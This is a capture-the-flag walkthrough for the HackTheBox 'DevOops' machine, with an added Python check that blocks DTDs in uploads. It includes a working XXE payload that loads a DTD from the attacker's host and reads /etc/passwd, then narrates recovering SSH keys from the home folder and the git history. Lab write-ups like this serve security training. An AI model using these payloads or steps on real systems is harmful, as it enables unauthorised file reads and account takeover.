DevOops Box Writeup & Walkthrough – [HTB] – HackTheBox

Introduction

DevOops is a machine on HackTheBox.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.

This article will show how to hack the DevOops box and get user.txt and root.txt.

DevOops Box

Collection

First, we use Nmap to scan the machine and see which ports are open.

DevOops Scan Ports

Let’s open a browser and visit http://10.10.10.91:5000/.

DevOops Port 5000

OK, it looks like a website. Let’s enumerate the website.

After enumeration, we found a page where we can upload an XML file.

Hack the DevOops Box

Get User.txt

I think that it has an XXE issue. But let’s submit a simple XML file first.

<note>
<Author>Tom</Author>
<Subject>Computer</Subject>
<Content>HowToBuyAMacComputer</Content>
</note>

After we submit this file, the website returns a message.

DevOops XML Message

Now, let’s submit our payload.

First, we create a new XML file:

<?xml version="1.0" ?>
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://10.10.14.2/1.dtd">%remote;%int;%trick;]>
<note>
<Author>&b;</Author>
<Subject>Jani</Subject>
<Content>Reminder</Content>
</note>

Then, we create a DTD file on our Kali Linux, the content is:

<!ENTITY b SYSTEM "file:///etc/passwd" >

Then, we start a simple HTTP server using Python.

Finally, it reads the /etc/passwd file.

DevOops XXE Read File
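
The file read succeeds because the upload handler accepts a DOCTYPE and resolves the entities it declares. As an added example (not part of the original writeup and not the box's own code), here is a server-side check in Python that refuses any upload carrying a DTD or entity declaration before the document is parsed. The function name, exception class and sample documents are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed samples: a plain note, and a note that declares an external entity.
BENIGN_NOTE = (b"<note><Author>Tom</Author><Subject>Computer</Subject>"
               b"<Content>HowToBuyAMacComputer</Content></note>")
XXE_NOTE = (b'<?xml version="1.0"?>\n'
            b'<!DOCTYPE note [ <!ENTITY b SYSTEM "file:///etc/passwd"> ]>\n'
            b"<note><Author>&b;</Author><Subject>Jani</Subject>"
            b"<Content>Reminder</Content></note>")


class ForbiddenXML(ValueError):
    """Raised when an upload is malformed or uses DTD features."""


def parse_upload(data: bytes) -> dict:
    """Return the child elements of an uploaded note, refusing DTDs and entities."""

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenXML(f"DOCTYPE declaration not allowed: {name!r}")

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenXML(f"entity declaration not allowed: {name!r}")

    def reject_external(context, base, sysid, pubid):
        raise ForbiddenXML(f"external entity reference not allowed: {sysid!r}")

    # Pass 1: walk the raw bytes with expat and abort on the first DTD feature.
    # An exception raised inside a handler propagates out of Parse().
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = reject_doctype
    checker.EntityDeclHandler = reject_entity
    checker.ExternalEntityRefHandler = reject_external
    try:
        checker.Parse(data, True)
    except expat.ExpatError as exc:
        raise ForbiddenXML(f"malformed XML: {exc}") from exc

    # Pass 2: the document is DTD-free, so build the tree normally.
    root = ET.fromstring(data)
    return {child.tag: (child.text or "") for child in root}


if __name__ == "__main__":
    print(parse_upload(BENIGN_NOTE))
    try:
        parse_upload(XXE_NOTE)
    except ForbiddenXML as err:
        print("rejected:", err)
```

A note format like the one on this page never needs a DOCTYPE, so rejecting it outright costs nothing and does not depend on how a particular parser is configured to treat entities.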

Since SSH is open, I think that I can find an SSH key in the default folder.

DevOops SSH Key

Then, we got user.txt.

DevOops UserTxT

Get Root.txt

We found that there is a “git” user. So, we try to log in as git.

DevOops Git User

Then, we check the .bash_history file.

DevOops BashHistory

We found that the git user initialized a git repo. Let’s go to this folder and see what we can find.

We check the git log.

DevOops Git Log

We found that this user added a key. Let’s check this commit.

DevOops Git Root Key

Then, we use this key to log in.

DevOops Root TXT

Summary

This box is not difficult; the difficulty should be around 3. There are 2 challenges. The first is creating the XML payload. The second is finding that there is a git user account that can be logged in to. Once you find that you can log in as git, you will realise that there must be some information in the git log.
